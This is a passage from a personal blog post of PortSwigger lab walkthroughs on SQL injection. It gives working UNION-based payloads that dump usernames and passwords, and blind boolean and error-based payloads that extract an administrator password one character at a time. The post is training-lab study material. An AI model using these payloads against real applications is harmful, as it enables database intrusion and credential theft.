<h4 id="Lab-UNION-attack-finding-a-column-containing-text"><a href="#Lab-UNION-attack-finding-a-column-containing-text" class="headerlink" title="Lab: UNION attack, finding a column containing text"></a>Lab: UNION attack, finding a column containing text</h4><div style="text-align: justify">

<p>The question asks to <code>Make the database retrieve the string: &#39;kJKA4j&#39;</code>. First, verify if the return value is correct.<br>If the column data type is incompatible with string data, the injected query will cause a database error.</p>
<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; UNION SELECT &#x27;</span>kJKA4j<span class="string">&#x27;,NULL,NULL--</span></span><br><span class="line"><span class="string">&#x27;</span> <span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="keyword">NULL</span>,<span class="string">&#x27;kJKA4j&#x27;</span>,<span class="keyword">NULL</span><span class="comment">--</span></span><br><span class="line"><span class="string">&#x27; UNION SELECT NULL,NULL,&#x27;</span>kJKA4j<span class="string">&#x27;--</span></span><br></pre></td></tr></table></figure></div>
<p><code>https://link/filter?category=Gifts&#39; UNION SELECT NULL,&#39;kJKA4j&#39;,NULL--</code></p>
</div>
<br><br><br><br><br><br>

<h4 id="Lab-UNION-attack-retrieving-data-from-other-tables"><a href="#Lab-UNION-attack-retrieving-data-from-other-tables" class="headerlink" title="Lab: UNION attack, retrieving data from other tables"></a>Lab: UNION attack, retrieving data from other tables</h4><div style="text-align: justify">

<p>To successfully perform SQL injection, you need to first confirm the number and types of table columns. If you know the original query returns two columns that can store strings, and the database has a users table containing username and password columns, you can inject <code>&#39; UNION SELECT username, password FROM users--</code>.</p>
<p><code>https://link/filter?category=Gifts&#39; UNION SELECT username, password FROM users--</code></p>
</div>
<br><br><br><br><br><br>



<h4 id="Lab-UNION-attack-retrieving-multiple-values-in-a-single-column"><a href="#Lab-UNION-attack-retrieving-multiple-values-in-a-single-column" class="headerlink" title="Lab: UNION attack, retrieving multiple values in a single column"></a>Lab: UNION attack, retrieving multiple values in a single column</h4><div style="text-align: justify">
Since the original query returns two columns and only the second column can store text data, we use NULL to fill the first column and concatenate username and password in the second text-capable column.

<p>That’s why we use:<code>&#39; UNION SELECT NULL, username || password FROM users--</code><br>Instead of:<code>&#39; UNION SELECT username, password FROM users--</code></p>
<p>First, try using:<code>&#39; UNION SELECT NULL, username || password FROM users--</code><br>Then, to separate username and password:<code>&#39; UNION SELECT NULL, username || &#39;~&#39; || password FROM users--</code><br>You can also use:<code>&#39; UNION SELECT NULL, username || &#39;*&#39; || password FROM users--</code></p>
<p><code>https://link/filter?category=Tech+gifts&#39; UNION SELECT NULL, username || &#39;~&#39; || password FROM users--</code></p>
</div>
<br><br><br><br><br><br>


<h4 id="Lab-Blind-SQL-injection-with-conditional-responses"><a href="#Lab-Blind-SQL-injection-with-conditional-responses" class="headerlink" title="Lab: Blind SQL injection with conditional responses"></a>Lab: Blind SQL injection with conditional responses</h4><div style="text-align: justify">

<p>First, confirm the TrackingId in the cookie.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/8.png"
                      width="800" height="200"
                ></p>
<p>Use <code>&#39; and 1=1--</code> and encode it as <code>&#39;+and+1%3d1--</code>. The response should return “Welcome back”.</p>
<p>Confirm the existence of the users table with the query<br><code>&#39; and (select &#39;x&#39; from users LIMIT 1)=&#39;x&#39;--</code>.<br>Encode it using (Ctrl+U) <code>&#39;+and+(select+&#39;x&#39;+from+users+LINIT+1)%3d&#39;x&#39;--</code>.</p>
<p>Confirm the presence of username in the users table.<br><code>&#39; and (select username from users where username=&#39;administrator&#39;)=&#39;administrator&#39;--</code></p>
<p>Confirm the presence of password in the users table.<br><code>&#39; and (select username from users where username=&#39;administrator&#39; and LENGTH(password)&gt;1)=&#39;administrator&#39;--</code><br>Password is exactly 20 characters.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/9.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/10.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/11.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/12.png"
                      width="400" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/13.png"
                      width="400" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/14.png"
                      width="800" height="200"
                ></p>
<p><code>&#39; and (select substring(password,1,1) from users where username=&#39;administrator&#39;)=&#39;a&#39;--</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/15.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/16.png"
                      width="800" height="200"
                ></p>
<p>Switch to a Cluster Bomb attack.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/17.png"
                      width="800" height="200"
                ></p>
<p>Modify the query to <code>substring(password,$1$,1)</code> and <code>=&#39;$a$&#39;</code>.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/18.png"
                      width="400" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/19.png"
                      width="400" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/20.png"
                      width="400" height="200"
                ></p>
<p>2ps9vcf81r0ovyjcrysn<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/21.png"
                      width="400" height="200"
                ></p>
<ul>
<li><a class="link"   target="_blank" rel="noopener" href="https://youtu.be/W3zvXK9i75A?si=AB_MUpSpRoFGy4Sm" >Reference<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></div>
<br><br><br><br><br><br></li>
</ul>
<h4 id="Lab-Blind-SQL-injection-with-conditional-errors"><a href="#Lab-Blind-SQL-injection-with-conditional-errors" class="headerlink" title="Lab: Blind SQL injection with conditional errors"></a>Lab: Blind SQL injection with conditional errors</h4><div style="text-align: justify">

<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE &#x27;</span>a<span class="string">&#x27; END FROM dual)=&#x27;</span>a<span class="string">&#x27;--</span></span><br></pre></td></tr></table></figure></div>

<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; AND (SELECT CASE WHEN LENGTH(password)&gt;1 THEN TO_CHAR(1/0) ELSE &#x27;</span>a<span class="string">&#x27; END FROM users WHERE username=&#x27;</span>administrator<span class="string">&#x27;)=&#x27;</span>a<span class="string">&#x27;--</span></span><br></pre></td></tr></table></figure></div>

<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; AND (SELECT CASE WHEN LENGTH(password)&gt;100 THEN TO_CHAR(1/0) ELSE &#x27;</span>a<span class="string">&#x27; END FROM users WHERE username=&#x27;</span>administrator<span class="string">&#x27;)=&#x27;</span>a<span class="string">&#x27;--</span></span><br></pre></td></tr></table></figure></div>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/22.png"
                      width="800" height="200"
                >
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/23.png"
                      width="800" height="200"
                >


<p><code>&#39; AND (SELECT CASE WHEN LENGTH(password)&gt;$100$ THEN TO_CHAR(1/0) ELSE &#39;$a$&#39; END FROM users WHERE username=&#39;administrator&#39;)=&#39;a&#39;--</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/24.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/25.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/26.png"
                      width="800" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/27.png"
                      width="800" height="200"
                ></p>
<p>80yru32hzwoxhxcg8hp1<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/28.png"
                      width="800" height="200"
                ></p>
<ul>
<li><a class="link"   target="_blank" rel="noopener" href="https://youtu.be/HjXUtCKm1FM?si=-Hy_Aru6UhdKSj2u" >Reference<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></div>
<br><br><br><br><br><br></li>
</ul>
<h4 id="Lab-Visible-error-based-SQL-injection"><a href="#Lab-Visible-error-based-SQL-injection" class="headerlink" title="Lab: Visible error-based SQL injection"></a>Lab: Visible error-based SQL injection</h4><div style="text-align: justify">
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Blind-SQL-injection-with-time-delays"><a href="#Lab-Blind-SQL-injection-with-time-delays" class="headerlink" title="Lab: Blind SQL injection with time delays"></a>Lab: Blind SQL injection with time delays</h4><div style="text-align: justify">
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Blind-SQL-injection-with-time-delays-and-information-retrieval"><a href="#Lab-Blind-SQL-injection-with-time-delays-and-information-retrieval" class="headerlink" title="Lab: Blind SQL injection with time delays and information retrieval"></a>Lab: Blind SQL injection with time delays and information retrieval</h4><div style="text-align: justify">
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Blind-SQL-injection-with-out-of-band-interaction"><a href="#Lab-Blind-SQL-injection-with-out-of-band-interaction" class="headerlink" title="Lab: Blind SQL injection with out-of-band interaction"></a>Lab: Blind SQL injection with out-of-band interaction</h4><div style="text-align: justify">
</div>
<br><br><br><br><br><br>


<h4 id="Lab-Blind-SQL-injection-with-out-of-band-data-exfiltration"><a href="#Lab-Blind-SQL-injection-with-out-of-band-data-exfiltration" class="headerlink" title="Lab: Blind SQL injection with out-of-band data exfiltration"></a>Lab: Blind SQL injection with out-of-band data exfiltration</h4><div style="text-align: justify">
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Filter-bypass-via-XML-encoding"><a href="#Lab-Filter-bypass-via-XML-encoding" class="headerlink" title="Lab: Filter bypass via XML encoding"></a>Lab: Filter bypass via XML encoding</h4><div style="text-align: justify">
</div>
<br><br><br><br><br><br>
		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> SQL injection</li>
        <li><strong>Author:</strong> Dieno</li>
        <li><strong>Created at
                :</strong> 2024-12-03 00:42:04</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-12-08 23:31:55
            </li>
        
        <li>
            <strong>Link:</strong> https://di3n0.github.io/2024/12/03/SQL-injection/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/PortSwigger/">#PortSwigger</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2024/12/08/MyBook/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">MyBook</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2024/12/03/PortSwigger/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">PortSwigger</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'en-US',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">SQL injection</div>
		<ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL-Injection"><span class="nav-text">SQL Injection</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL-injection-cheat-sheet"><span class="nav-text">SQL injection cheat sheet</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Vulnerability-in-WHERE-clause-allowing-retrieval-of-hidden-data"><span class="nav-text">Lab: Vulnerability in WHERE clause allowing retrieval of hidden data</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Vulnerability-allowing-login-bypass"><span class="nav-text">Lab: Vulnerability allowing login bypass</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Attack-querying-the-database-type-and-version-on-Oracle"><span class="nav-text">Lab: Attack, querying the database type and version on Oracle</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Attack-querying-the-database-type-and-version-on-MySQL-and-Microsoft"><span class="nav-text">Lab: Attack, querying the database type and version on MySQL and Microsoft</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Attack-listing-the-database-contents-on-non-Oracle-databases"><span class="nav-text">Lab: Attack, listing the database contents on non-Oracle databases</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Attack-listing-the-database-contents-on-non-Oracle-databases-1"><span class="nav-text">Lab: Attack, listing the database contents on non-Oracle databases</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-UNION-attack-determining-the-number-of-columns-returned-by-the-query"><span class="nav-text">Lab: UNION attack, determining the number of columns returned by the query</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-UNION-attack-finding-a-column-containing-text"><span class="nav-text">Lab: UNION attack, finding a column containing text</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-UNION-attack-retrieving-data-from-other-tables"><span class="nav-text">Lab: UNION attack, retrieving data from other tables</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-UNION-attack-retrieving-multiple-values-in-a-single-column"><span class="nav-text">Lab: UNION attack, retrieving multiple values in a single column</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Blind-SQL-injection-with-conditional-responses"><span class="nav-text">Lab: Blind SQL injection with conditional responses</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Blind-SQL-injection-with-conditional-errors"><span class="nav-text">Lab: Blind SQL injection with conditional errors</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Visible-error-based-SQL-injection"><span class="nav-text">Lab: Visible error-based SQL injection</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Blind-SQL-injection-with-time-delays"><span class="nav-text">Lab: Blind SQL injection with time delays</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Blind-SQL-injection-with-time-delays-and-information-retrieval"><span class="nav-text">Lab: Blind SQL injection with time delays and information retrieval</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Blind-SQL-injection-with-out-of-band-interaction"><span class="nav-text">Lab: Blind SQL injection with out-of-band interaction</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Blind-SQL-injection-with-out-of-band-data-exfiltration"><span class="nav-text">Lab: Blind SQL injection with out-of-band data exfiltration</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-Filter-bypass-via-XML-encoding"><span class="nav-text">Lab: Filter bypass via XML encoding</span></a></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2024</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Dieno</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        11 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="Search..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>